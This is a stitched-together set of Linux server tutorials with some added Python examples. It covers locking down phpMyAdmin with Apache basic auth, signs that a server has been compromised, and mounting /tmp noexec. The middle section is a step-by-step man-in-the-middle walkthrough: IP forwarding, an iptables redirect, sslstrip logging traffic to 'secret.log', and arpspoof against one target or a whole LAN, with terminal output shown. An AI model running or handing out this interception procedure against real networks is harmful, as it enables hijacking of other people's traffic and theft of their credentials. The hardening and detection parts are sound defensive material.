Web Server


These instructions were performed on an Ubuntu 11.10 machine via SSH.
So, I was messing around with phpMyAdmin and noticed the directory
/usr/share/phpmyadmin/setup.  I browsed to
http://mydomainname.com/phpmyadmin/setup
and it immediately asked for credentials to log in.  First of all, phpMyAdmin
has already been set up...why leave the setup directory on the server
when it's not needed?

I then deleted the setup folder, /usr/share/phpmyadmin/setup:
sudo rm -rf /usr/share/phpmyadmin/setup

Now, by default you can access the phpMyAdmin web interface simply by
browsing to http://mydomainname.com/phpmyadmin
I want this directory on my server to have an extra layer of
protection.  I know that you have to log in to the phpMyAdmin interface
first, but I'm a security-conscious guy.  Why not add more security
when you can?

We will take a look at phpMyAdmin's default Apache configuration file.
I browse to the directory /etc/phpmyadmin and take a look at the file
apache.conf.

Here is the output of apache.conf:
# phpMyAdmin default Apache configuration

Alias /phpmyadmin /usr/share/phpmyadmin

<Directory /usr/share/phpmyadmin>
    Options FollowSymLinks
    DirectoryIndex index.php

    <IfModule mod_php5.c>
        AddType application/x-httpd-php .php

        php_flag magic_quotes_gpc Off
        php_flag track_vars On
        php_flag register_globals Off
        php_admin_flag allow_url_fopen Off
        php_value include_path .
        php_admin_value upload_tmp_dir /var/lib/phpmyadmin/tmp
        php_admin_value open_basedir /usr/share/phpmyadmin/:/etc/phpmyadmin/:/var/lib/phpmyadmin/
    </IfModule>

</Directory>

# Authorize for setup
<Directory /usr/share/phpmyadmin/setup>
    <IfModule mod_authn_file.c>
    AuthType Basic
    AuthName "phpMyAdmin Setup"
    AuthUserFile /etc/phpmyadmin/htpasswd.setup
    </IfModule>
    Require valid-user
</Directory>

# Disallow web access to directories that don't need it
<Directory /usr/share/phpmyadmin/libraries>
    Order Deny,Allow
    Deny from All
</Directory>
<Directory /usr/share/phpmyadmin/setup/lib>
    Order Deny,Allow
    Deny from All
</Directory>


Ok, so what I'm going to accomplish here is to load the module
"mod_authn_file.c" for the whole phpMyAdmin directory (this is like adding a
.htaccess file to the /usr/share/phpmyadmin directory).

Here is my edited /etc/phpmyadmin/apache.conf file:
Note: the lines I added start right below "DirectoryIndex index.php".
In the line "AuthUserFile /data/user-access/.htpasswd", that path is where
my default .htpasswd file for my .htaccess files lives.  If you want to
see how this works and how it is set up, check out the article here:
https://codersresource.com/linux/web-server/controlling-directory-access-with-an-htaccess-file
I also commented out all the lines under the "Authorize for setup" section
(no need for it now that the setup directory is gone).

# phpMyAdmin default Apache configuration

Alias /phpmyadmin /usr/share/phpmyadmin

<Directory /usr/share/phpmyadmin>
    Options FollowSymLinks
    DirectoryIndex index.php

    <IfModule mod_authn_file.c>
    AuthType Basic
    AuthName "Restricted Access!"
    AuthUserFile /data/user-access/.htpasswd
    </IfModule>
    Require valid-user

    <IfModule mod_php5.c>
        AddType application/x-httpd-php .php

        php_flag magic_quotes_gpc Off
        php_flag track_vars On
        php_flag register_globals Off
        php_admin_flag allow_url_fopen Off
        php_value include_path .
        php_admin_value upload_tmp_dir /var/lib/phpmyadmin/tmp
        php_admin_value open_basedir /usr/share/phpmyadmin/:/etc/phpmyadmin/:/var/lib/phpmyadmin/
    </IfModule>

</Directory>

# Authorize for setup
#<Directory /usr/share/phpmyadmin/setup>
#    <IfModule mod_authn_file.c>
#    AuthType Basic
#    AuthName "phpMyAdmin Setup"
#    AuthUserFile /etc/phpmyadmin/htpasswd.setup
#    </IfModule>
#    Require valid-user
#</Directory>

# Disallow web access to directories that don't need it
<Directory /usr/share/phpmyadmin/libraries>
    Order Deny,Allow
    Deny from All
</Directory>
<Directory /usr/share/phpmyadmin/setup/lib>
    Order Deny,Allow
    Deny from All
</Directory>


After you have made the changes above, save the file.  Then restart Apache:
sudo /etc/init.d/apache2 restart

Now if you browse to http://mydomainname.com/phpmyadmin Apache will
prompt you for a username and password...just an extra layer of
security ;)

A very quick and easy way to control directory access is to create a .htaccess file.  The .htaccess file tells Apache to require valid user credentials for whatever directory you put the .htaccess file in.

First, we have to create the .htpasswd file.  This file contains each username and a hash of that user's password.

Example output of the .htpasswd file would look like this:

user:$apr1$ROvNIWjo$96bOcy.gSiVuMlD9jphYO.
user2:$apr1$ROvNIWjo$96bOcy.gSiVuMlD9jphYO.
user3:$apr1$ROvNIWjo$96bOcy.gSiVuMlD9jphYO.

To create the file run this command (-c creates a new file, overwriting one that already exists, so use it only for the first user):
sudo htpasswd -c .htpasswd <username>
It will ask you for a password.

To add users to an existing .htpasswd file:
sudo htpasswd .htpasswd <username>
Again, it will ask you for a password.
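To see what those .htpasswd entries actually contain, here is an added example (not from the original article) that parses an .htpasswd file, verifies a password against a $apr1$ entry using the same MD5-based algorithm that htpasswd -m writes, and flags users whose entries are identical. It assumes the $apr1$<salt>$<digest> format shown above; the sample file is constructed from the listing.

```python
import hashlib
import hmac

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def apr1_crypt(password: str, salt: str) -> str:
    """Apache's APR1 variant of MD5-crypt, as written by `htpasswd -m`."""
    pw, slt, magic = password.encode(), salt[:8].encode(), b"$apr1$"
    ctx = hashlib.md5(pw + magic + slt)
    alt = hashlib.md5(pw + slt + pw).digest()
    n = len(pw)
    while n > 0:                      # mix in len(pw) bytes of the alternate digest
        ctx.update(alt[:min(16, n)])
        n -= 16
    n = len(pw)
    while n:                          # per-bit length mixing: a NUL or the first byte
        ctx.update(b"\x00" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):             # strengthening rounds
        ctx = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            ctx.update(slt)
        if i % 7:
            ctx.update(pw)
        ctx.update(final if i & 1 else pw)
        final = ctx.digest()

    def b64(v: int, count: int) -> bytes:   # crypt base64, low 6 bits first
        out = b""
        for _ in range(count):
            out += ITOA64[v & 0x3F:(v & 0x3F) + 1]
            v >>= 6
        return out
    triples = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = b"".join(b64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                   for a, b, c in triples) + b64(final[11], 2)
    return (magic + slt + b"$" + enc).decode()

def parse_htpasswd(text: str) -> dict:
    """Return {username: stored hash}; blank lines and comments are skipped."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            user, _, stored = line.partition(":")
            entries[user] = stored
    return entries

def verify_apr1(password: str, stored: str) -> bool:
    """True if password matches a $apr1$<salt>$<digest> entry (constant-time compare)."""
    if not stored.startswith("$apr1$"):
        return False
    salt = stored.split("$")[2]
    return hmac.compare_digest(apr1_crypt(password, salt), stored)

def shared_hashes(entries: dict) -> dict:
    """Map each stored hash used by more than one user to the list of those users.
    Same salt and same digest means the same password."""
    by_hash = {}
    for user, stored in entries.items():
        by_hash.setdefault(stored, []).append(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}

# Constructed sample modelled on the article's listing: three users, one identical entry
SAMPLE = """user:$apr1$ROvNIWjo$96bOcy.gSiVuMlD9jphYO.
user2:$apr1$ROvNIWjo$96bOcy.gSiVuMlD9jphYO.
user3:$apr1$ROvNIWjo$96bOcy.gSiVuMlD9jphYO.
"""
```

Three identical entries mean three users sharing one password, not merely one salt. Basic authentication also sends the password with every request, so a directory protected this way should only be served over HTTPS.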

I usually create a directory outside my document root (where my web sites are stored) called user-access
So, in my case the document root is located at /data/www
I will create the directory user-access in /data

Run this command:
sudo mkdir /data/user-access

Ok.  Remember the .htpasswd file we created above?  Move it to the new directory you just created, /data/user-access.
If I had created the file in my home directory, the command would be something like this:
sudo mv /home/user/.htpasswd /data/user-access

Now we are going to create the .htaccess file.  I want to restrict users from accessing a download directory on my server.
The directory in question is:
/data/www/downloads

I'm going to change to this directory and create the .htaccess file:
cd /data/www/downloads

Create the .htaccess file:
sudo vi .htaccess

Here is an example of what mine looks like:

AuthUserFile /data/user-access/.htpasswd
AuthName "Restricted Access - Valid User Credentials Required"
AuthType Basic

Require valid-user
Order allow,deny
Satisfy any

The line AuthUserFile /data/user-access/.htpasswd tells Apache where to look for the .htpasswd file we created
earlier.  It won't work if you don't set this file path correctly.

The line AuthName "Restricted Access - Valid User Credentials Required" sets the text shown in the login prompt; anything wrapped in quotes can be changed to whatever you decide.

The line Require valid-user simply says it will accept any user you created in the .htpasswd file.  If you want to restrict it to just a single user, you can change that line to Require user <username> (without the brackets).

Restart Apache (this command may differ depending on the Linux distribution you have installed):
sudo /etc/init.d/apache2 restart

You can use this .htaccess file to control access to pretty much any web directory now.  No need to modify anything in it, just move it to whatever directory you want to control access to.

This tutorial will show you how to set up sslstrip. It transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, then maps those links into either look-alike HTTP links or similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

Aren't you excited?!

Open a terminal window

Download sslstrip from:
http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

With this command:
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

#BEGIN TERMINAL OUTPUT
root@bt:~# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
--2011-12-05 01:35:11--  http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
Resolving www.thoughtcrime.org... 72.14.190.145
Connecting to www.thoughtcrime.org|72.14.190.145|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22198 (22K) [application/x-gzip]
Saving to: `sslstrip-0.9.tar.gz'

100%[====================================================================================>]
22,198      --.-K/s   in 0.07s

2011-12-05 01:35:11 (306 KB/s) - `sslstrip-0.9.tar.gz' saved [22198/22198]
#END TERMINAL OUTPUT

Extract the package "sslstrip-0.9.tar.gz" with the following command:
tar -zxvf sslstrip-0.9.tar.gz

#BEGIN TERMINAL OUTPUT
root@bt:~# tar -zxvf sslstrip-0.9.tar.gz
sslstrip-0.9/
sslstrip-0.9/README
sslstrip-0.9/COPYING
sslstrip-0.9/setup.py
sslstrip-0.9/sslstrip/
sslstrip-0.9/sslstrip/StrippingProxy.py
sslstrip-0.9/sslstrip/SSLServerConnection.py
sslstrip-0.9/sslstrip/ServerConnectionFactory.py
sslstrip-0.9/sslstrip/ClientRequest.py
sslstrip-0.9/sslstrip/ServerConnection.py
sslstrip-0.9/sslstrip/CookieCleaner.py
sslstrip-0.9/sslstrip/__init__.py
sslstrip-0.9/sslstrip/DnsCache.py
sslstrip-0.9/sslstrip/URLMonitor.py
sslstrip-0.9/lock.ico
sslstrip-0.9/sslstrip.py
#END TERMINAL OUTPUT

You also need to make sure you have python 2.5 or greater and the python "twisted web" module installed.
Install them like this:
apt-get install python python-twisted-web


In my case they were already installed:

#BEGIN TERMINAL OUTPUT
root@bt:~# apt-get install python python-twisted-web
Reading package lists... Done
Building dependency tree
Reading state information... Done
python is already the newest version.
python-twisted-web is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 38 not upgraded.
#END TERMINAL OUTPUT


Now change to the "sslstrip-0.9" directory:
cd sslstrip-0.9

#BEGIN TERMINAL OUTPUT
root@bt:~# cd sslstrip-0.9
root@bt:~/sslstrip-0.9# ls
COPYING  lock.ico  README  setup.py  sslstrip  sslstrip.py
#END TERMINAL OUTPUT

Run the command:
python ./setup.py install

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# python ./setup.py install
running install
running build
running build_py
creating build
creating build/lib.linux-x86_64-2.6
creating build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/CookieCleaner.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnectionFactory.py ->
build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/StrippingProxy.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ClientRequest.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/__init__.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/DnsCache.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/SSLServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/URLMonitor.py -> build/lib.linux-x86_64-2.6/sslstrip
running build_scripts
creating build/scripts-2.6
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
changing mode of build/scripts-2.6/sslstrip from 644 to 755
running install_lib
creating /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/CookieCleaner.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnectionFactory.py
-> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnection.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/StrippingProxy.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ClientRequest.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/__init__.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/DnsCache.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/SSLServerConnection.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/URLMonitor.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/CookieCleaner.py
to CookieCleaner.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnectionFactory.py
to ServerConnectionFactory.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py
to ServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/StrippingProxy.py
to StrippingProxy.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ClientRequest.py
to ClientRequest.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/__init__.py
to __init__.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/DnsCache.py
to DnsCache.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/SSLServerConnection.py
to SSLServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/URLMonitor.py
to URLMonitor.pyc
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
creating /usr/local/share/sslstrip
copying README -> /usr/local/share/sslstrip
copying COPYING -> /usr/local/share/sslstrip
copying lock.ico -> /usr/local/share/sslstrip
running install_egg_info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up...
#END TERMINAL OUTPUT


Now we need to turn on IP forwarding, run this command:
echo "1" > /proc/sys/net/ipv4/ip_forward


Ok, iptables has to be set up to redirect HTTP traffic to sslstrip:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

Change the <listenPort> above to an ephemeral port.  Something like 30000 should do.
So it should look like this:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 30000

Now we are going to execute sslstrip, run this command:
sslstrip -a -l 30000 -w secret.log

The listening port will be whatever you chose for iptables to redirect HTTP traffic to.

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip -a -l 30000 -w secret.log

sslstrip 0.9 by Moxie Marlinspike running...
#END TERMINAL OUTPUT

Notice above in the terminal output. Don't kill the terminal session. sslstrip is running!

Open a new terminal window.

Now we need to set up arpspoof so the network will think you are the gateway or router.  This way all traffic is sent to your machine first, then forwarded to the proper gateway on your network.
arpspoof -i <interface> -t <targetIP> <gatewayIP>

If you don't know your interface name, just run a quick "ifconfig"
command and it will list it. The <gatewayIP> is the network's real
gateway/router; this is the traffic we want to hijack.
If you want arpspoof to intercept traffic across the whole LAN run:
arpspoof -i <interface> <gatewayIP>

So, I would run the command like this:
arpspoof -i eth0 -t 10.10.1.20 10.10.1.254

#BEGIN TERMINAL OUTPUT
root@bt:~# arpspoof -i eth0 10.10.1.254
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
#END TERMINAL OUTPUT

Notice above in the terminal output, you will constantly receive arp
replies, just let it run.  Don't kill the terminal session.
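From the defender's side, here is an added example (not part of the tutorial) that detects this kind of poisoning: it parses ARP reply lines in the frame format arpspoof prints above, flags any IP whose claimed MAC differs from a known baseline or from its first sighting, and counts unsolicited broadcast replies. The baseline gateway MAC and the sample frames are constructed/assumed.

```python
import re
from collections import Counter

# "<src mac> <dst mac> 0806 <len>: arp reply <ip> is-at <mac>", as in the output above
ARP_REPLY = re.compile(
    r"^(?P<src>[0-9a-f:]+)\s+(?P<dst>[0-9a-f:]+)\s+0806\s+\d+:\s+arp reply\s+"
    r"(?P<ip>\d+\.\d+\.\d+\.\d+)\s+is-at\s+(?P<mac>[0-9a-f:]+)", re.I)
BROADCAST = "ff:ff:ff:ff:ff:ff"

def norm_mac(mac: str) -> str:
    """Zero-pad each octet so '0:c:29:..' and '00:0c:29:..' compare equal."""
    return ":".join(part.zfill(2).lower() for part in mac.split(":"))

def detect_arp_poisoning(lines, baseline):
    """baseline is {ip: mac} for addresses whose MAC is known good (the gateway at least).
    Returns alert strings: one per (ip, known mac, new mac) conflict, then one per
    (ip, mac) seen in unsolicited broadcast replies, which normal hosts rarely send."""
    table = {ip: norm_mac(m) for ip, m in baseline.items()}
    conflicts, broadcast = Counter(), Counter()
    for line in lines:
        m = ARP_REPLY.match(line.strip())
        if not m:
            continue
        ip, mac = m["ip"], norm_mac(m["mac"])
        if norm_mac(m["dst"]) == BROADCAST:
            broadcast[(ip, mac)] += 1
        known = table.setdefault(ip, mac)   # first sighting becomes the reference
        if known != mac:
            conflicts[(ip, known, mac)] += 1
    alerts = [f"{ip} claimed by {new} but known as {old} ({n} replies)"
              for (ip, old, new), n in conflicts.items()]
    alerts += [f"unsolicited broadcast reply: {ip} is-at {mac} ({n} frames)"
               for (ip, mac), n in broadcast.items()]
    return alerts

# Constructed sample: two poisoning frames in the tutorial's output format, then one
# legitimate unicast reply from the real gateway.
SAMPLE = """0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:50:56:aa:bb:cc 0:c:29:12:34:56 0806 42: arp reply 10.10.1.254 is-at 0:50:56:aa:bb:cc
""".splitlines()
# Assumed baseline: the real gateway's MAC, recorded while the network was known good
BASELINE = {"10.10.1.254": "00:50:56:aa:bb:cc"}

if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE, BASELINE):
        print("ALERT:", alert)
```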

If you need additional help just run:
sslstrip --help

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip --help

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and
from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.
#END TERMINAL OUTPUT


That's it...have fun!

Here lately, I have seen tons of web applications get exploited, just because individuals did not update 3rd party extensions or apply patches.  If you take security seriously you should do these things.  Most people are afraid of other things breaking when they update, so they just leave it alone.  That introduces attack vectors for that particular server.  My philosophy behind it all is: update your servers.  If something breaks, it can be fixed.  Would you rather take a little more time and do things right, or let your server get compromised?

Here are some ways to check for signs of your server being hacked:
Favorite places for bots to hide are /tmp, /var/tmp/, /dev/shm/ and users' home directories.  Sometimes the bot may be hidden in a directory with a misleading name like /tmp/".  ."/ or similar.  Keep a copy of anything you find; you may be able to look at the code to see where the attack originated.

So make sure you check these directories; in each one, run:
ls -l -a

This will list all files, including hidden files.  Also, take note of the timestamps on the files.

You may also be able to find bots hiding by running the following commands:
find / -exec grep -l "sybnc" {} +
find / -name "*.set" | perl -pe 's/.\/\w+-(\w+)-.*/$1/' | sort | uniq
find / -name "inst" | perl -pe 's/.\/\w+-(\w+)-.*/$1/' | sort | uniq

Check whether netstat shows any remote connections in the port range 6660-7000:
netstat -tanp

My server isn't compromised, but here is what the output looks like when you run the command above:

#BEGIN TERMINAL OUTPUT
root@bt:~# netstat -tanp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:7175          0.0.0.0:*               LISTEN      1205/postgres
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1264/apache2
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      1100/cupsd
tcp6       0      0 ::1:7175                :::*                    LISTEN      1205/postgres
tcp6       0      0 ::1:631                 :::*                    LISTEN      1100/cupsd
#END TERMINAL OUTPUT

If you do find a connection to a remote port within the range 6660-7000, run this command to find out what user/process it is running under:
lsof -i tcp:<port>

Replace <port> above with the port you want to investigate.

Start looking for any suspicious entries in your Apache error log whose timestamps match those of the files you found (if any) in /tmp, /var/tmp/, /dev/shm/ or a user's home directory.

Here is an example of a suspicious entry:
217.170.53.79 - - [03/Dec/2011:19:48:13 +0100] "POST /phpmyadmin/index.php?session_to_unset=123token=42..._SESSION[!bla]=%7Cx...


This one exploited phpMyAdmin.  Take a look at the article located here http://pastebin.com/DUBeKQv5 on how to secure phpMyAdmin.
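Two of the checks above as code, added here and not part of the original post: the 6660-7000 rule applied to netstat -tanp output, and a scan of access-log lines (the format the suspicious entry above is in) for the session_to_unset / _SESSION[ phpMyAdmin request pattern. Both samples are constructed and use documentation address ranges, not real indicators.

```python
import re

IRC_RANGE = range(6660, 7001)   # the range the article names for IRC-controlled bots

def netstat_remote_irc_ports(netstat_text: str):
    """Return [(local, foreign, state, pid/program)] for TCP sockets whose *foreign*
    port is in IRC_RANGE. Listening sockets (foreign 0.0.0.0:* or :::*) never match."""
    hits = []
    for line in netstat_text.splitlines():
        cols = line.split()
        if len(cols) < 6 or not cols[0].startswith("tcp"):
            continue   # banner, header line, or a non-TCP row
        local, foreign, state = cols[3], cols[4], cols[5]
        prog = cols[6] if len(cols) > 6 else "-"
        port = foreign.rsplit(":", 1)[-1]
        if port.isdigit() and int(port) in IRC_RANGE:
            hits.append((local, foreign, state, prog))
    return hits

# client - - [timestamp] "METHOD url ..." (common/combined access-log format)
ACCESS_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\w+) (?P<url>\S+)')
# The entry above carries session_to_unset together with a _SESSION[ key;
# neither appears in ordinary phpMyAdmin use.
SESSION_ATTACK = re.compile(r"session_to_unset|_SESSION\[", re.I)

def phpmyadmin_session_attacks(log_text: str):
    """Return [(client_ip, timestamp, url)] for phpMyAdmin requests matching SESSION_ATTACK."""
    hits = []
    for line in log_text.splitlines():
        m = ACCESS_LINE.match(line)
        if m and "phpmyadmin" in m["url"].lower() and SESSION_ATTACK.search(m["url"]):
            hits.append((m["ip"], m["ts"], m["url"]))
    return hits

# Constructed `netstat -tanp` excerpt: listeners plus one outbound connection to an IRC port
NETSTAT_SAMPLE = """Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1264/apache2
tcp        0      0 192.0.2.10:41022        198.51.100.7:6667       ESTABLISHED 2211/perl
tcp        0      0 192.0.2.10:41030        198.51.100.7:443        ESTABLISHED 2300/curl
tcp6       0      0 ::1:631                 :::*                    LISTEN      1100/cupsd
"""
# Constructed access-log excerpt modelled on the suspicious entry above
LOG_SAMPLE = """203.0.113.5 - - [03/Dec/2011:19:48:13 +0100] "POST /phpmyadmin/index.php?session_to_unset=123&token=42&_SESSION[!bla]=%7Cx HTTP/1.1" 200 512
198.51.100.20 - - [03/Dec/2011:19:50:01 +0100] "GET /phpmyadmin/index.php?token=42 HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for hit in netstat_remote_irc_ports(NETSTAT_SAMPLE):
        print("IRC-range connection:", hit)
    for ip, ts, url in phpmyadmin_session_attacks(LOG_SAMPLE):
        print("phpMyAdmin session attack from", ip, "at", ts)
```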

Set up Fail2ban.  Fail2ban scans log files like /var/log/pwdfail or /var/log/apache/error_log and bans IP addresses that make too many
password failures.  It updates the firewall rules to reject the IP address.

Implement OSSEC-HIDS (http://www.ossec.net) with inotify() to watch for changes to your system and Apache directories, including those that are writable through HTTP.

Another good security step is to mount /tmp with noexec,nosuid,nodev
Here's how:

Check to see if your fstab has a /tmp file mounting option:
cat /etc/fstab | grep /tmp

The command above will display NO output if /tmp is not mounted as its
own partition.

cd /dev

Now we are going to create a 100MB file for our /tmp partition:
dd if=/dev/zero of=tmpMnt bs=1024 count=100000

#BEGIN TERMINAL OUTPUT
root@bt:/dev# dd if=/dev/zero of=tmpMnt bs=1024 count=100000
100000+0 records in
100000+0 records out
102400000 bytes (102 MB) copied, 0.535322 s, 191 MB/s
#END TERMINAL OUTPUT

Next make an extended filesystem for the tmpMnt file:
mke2fs /dev/tmpMnt

#BEGIN TERMINAL OUTPUT
root@bt:/dev# mke2fs /dev/tmpMnt
mke2fs 1.41.11 (14-Mar-2010)
/dev/tmpMnt is not a block special device.
Proceed anyway? (y,n) y
Filesystem label=
OS type: Linux
Block size=1024 (log=0)
Fragment size=1024 (log=0)
Stride=0 blocks, Stripe width=0 blocks
25064 inodes, 100000 blocks
5000 blocks (5.00%) reserved for the super user
First data block=1
Maximum filesystem blocks=67371008
13 block groups
8192 blocks per group, 8192 fragments per group
1928 inodes per group
Superblock backups stored on blocks:
8193, 24577, 40961, 57345, 73729

Writing inode tables: done
Writing superblocks and filesystem accounting information: done

This filesystem will be automatically checked every 21 mounts or
180 days, whichever comes first.  Use tune2fs -c or -i to override.
#END TERMINAL OUTPUT

Now backup your /tmp directory:
cp -R /tmp /tmp_backup

Check ownership of the files in your /tmp directory, make sure you
keep a note of this:
ls -al /tmp

#BEGIN TERMINAL OUTPUT
root@bt:/# ls -al /tmp
total 52
drwxrwxrwt 11 root root 4096 2011-12-05 11:45 .
drwxr-xr-x 30 root root 4096 2011-12-05 12:39 ..
drwxrwxrwt  2 root root 4096 2011-12-05 11:45 .ICE-unix
drwx------  2 root root 4096 2011-12-05 11:45 kde-root
drwx------  2 root root 4096 2011-12-05 11:45 ksocket-root
drwx------  2 root root 4096 2011-12-05 11:45 orbit-root
drwx------  2 root root 4096 2011-12-05 11:45 pulse-I5uG1yhc3uav
-rw-------  1 root root  141 2011-12-05 11:44 serverauth.wrvKiuVkuy
drwx------  2 root root 4096 2011-12-05 11:44 ssh-dFpQYr1373
drwx------  2 root root 4096 2011-12-05 11:45 vmware-root
drwxr-xr-x  2 root root 4096 2011-12-05 11:44 .winbindd
-r--r--r--  1 root root   11 2011-12-05 11:44 .X0-lock
drwxrwxrwt  2 root root 4096 2011-12-05 11:44 .X11-unix
#END TERMINAL OUTPUT

Now modify your /etc/fstab file to mount the new partition:
vi /etc/fstab

and insert this line at the bottom:
/dev/tmpMnt /tmp ext2 loop,nosuid,noexec,nodev,noatime,rw 0 0

What the file should look like (this may differ from what you already
have, but the relevance is the line at the bottom):
# /etc/fstab: static file system information.
#
# Use 'blkid -o value -s UUID' to print the universally unique identifier
# for a device; this may be used with UUID= as a more robust way to name
# devices that works even if disks are added and removed. See fstab(5).
#
#
proc            /proc           proc    nodev,noexec,nosuid 0       0
# / was on /dev/sda1 during installation
UUID=03718980-9d4b-41eb-b8d6-a64c2c4b2017 /               ext4    errors=remount-ro 0       1
# swap was on /dev/sda5 during installation
UUID=c7517411-ea02-4002-b641-9651ccf6e046 none            swap    sw              0       0
/dev/fd0        /media/floppy0  auto    rw,user,noauto,exec,utf8 0       0
/dev/tmpMnt     /tmp            ext2    loop,nosuid,noexec,nodev,noatime,rw 0 0


Now we are going to mount the new filesystem we created with loop,nosuid,noexec,nodev,noatime:
mount -o loop,nosuid,noexec,nodev,noatime,rw /dev/tmpMnt /tmp

Run this command to chmod /tmp:
chmod 1777 /tmp

As a precaution, run the remount command to display any errors (no output will be displayed if there are not any errors):
mount -o remount /tmp

Now copy everything back from the /tmp_backup directory to the new /tmp partition (the trailing "/." makes cp include the hidden dot-files and directories such as .X11-unix, which a bare * would skip, and -a preserves ownership and permissions):
cp -a /tmp_backup/. /tmp/

Check to make sure everything was copied correctly:
ls -al /tmp

#BEGIN TERMINAL OUTPUT
